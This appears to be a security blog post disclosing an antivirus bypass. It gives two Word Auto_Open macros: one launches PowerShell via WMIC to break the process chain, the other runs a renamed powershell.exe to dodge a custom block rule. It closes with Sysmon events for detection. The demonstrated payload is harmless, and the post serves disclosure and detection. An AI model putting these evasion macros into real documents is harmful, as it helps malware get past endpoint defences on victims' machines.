AV Bypass

Found a way to bypass a well-known Enterprise AV solution a while ago.  I'm afraid to disclose it to anyone other than the vendor.  I disclosed it to that particular vendor, and they haven't quite solved the problem, yet.  I don't want to cause anyone any undue hardship from disclosing this particular vulnerability, but it's probably already well-known.  The difficulty in solving this is that the way to bypass this AV uses Windows built-in tools and it produces a lot of false positives.  This vendor thought that they had a solution in a signature update, but it didn't cover the wide variety of ways that this particular Windows built-in tool could be used.  I'm horrified by this, but not exactly surprised.  This is why defense in depth is so vitally important.  Where one solution fails, another will succeed.  I wish I could say more.  I can't quite figure out how it works.  I'm scratching my head because it shouldn't work.  I put protections in place by making custom rules, and it's not firing on any of the custom rules even though it should.  Thought I had an idea of why.  That was proven to be wrong.  Wish I could figure this out because if I found it, I'm fairly certain the bad guys have probably already found it.  I guess I can release the exploit.  Someone will figure out who the vendor is.  I just hope that by releasing this, a fix can be made.  Some of you will say, "Well, Emotet does that..."  You're right - but does it do it in this exact way?  Emotet was what inspired me to try this.  And yes, I know, this isn't l33t.

Create a macro in Word and add this technique:

Sub Auto_Open()
'
' Auto_Open Macro
'
'
Shell ("wmic process call create 'powershell.exe chrome.exe https://www.youtube.com/watch?v=dQw4w9WgXcQ'")
End Sub


Here's another one bypassing a custom rule telling my AV solution not to allow winword.exe to run powershell.exe by copying powershell.exe to my Desktop and renaming it to dog.exe

Sub Auto_Open()
'
' Auto_Open Macro
'
'
Shell ("C:\Users\Bob\Desktop\dog.exe Start-Process chrome.exe 'https://www.youtube.com/watch?v=dQw4w9WgXcQ'")
End Sub

Showing these as well - Windows Events - to help detect this.

Process Create:
UtcTime: 2019-09-23 20:47:36.217
ProcessGuid: {}
ProcessId: 22412
Image: C:\Program Files (x86)\Microsoft Office\Officex\WINWORD.EXE
CommandLine: "C:\Program Files (x86)\Microsoft Office\Officex\WINWORD.EXE" /n "C:\Users\BOB\Downloads\Bob.docm" /o ""

CurrentDirectory: C:\WINDOWS\system32\
User: BOB\BOB
LogonGuid: {}
LogonId:
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA1=
ParentProcessGuid: {}
ParentProcessId: 7088
ParentImage: C:\Windows\explorer.exe
ParentCommandLine: "C:\Windows\explorer.exe" /LOADSAVEDWINDOW

Process Create:
UtcTime: 2019-09-23 20:47:39.828
ProcessGuid: {}
ProcessId: 1136
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
CommandLine: powershell.exe Start-Process chrome.exe https://youtu.be/dQw4w9WgXcQ
CurrentDirectory: c:\windows\system32\spool\drivers\x64\3\
User: BOB\BOB
LogonGuid: {}
LogonId:
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA1=
ParentProcessGuid: {}
ParentProcessId: 6868
ParentImage: C:\Windows\System32\wbem\WmiPrvSE.exe
ParentCommandLine: C:\WINDOWS\system32\wbem\wmiprvse.exe -secured -Embedding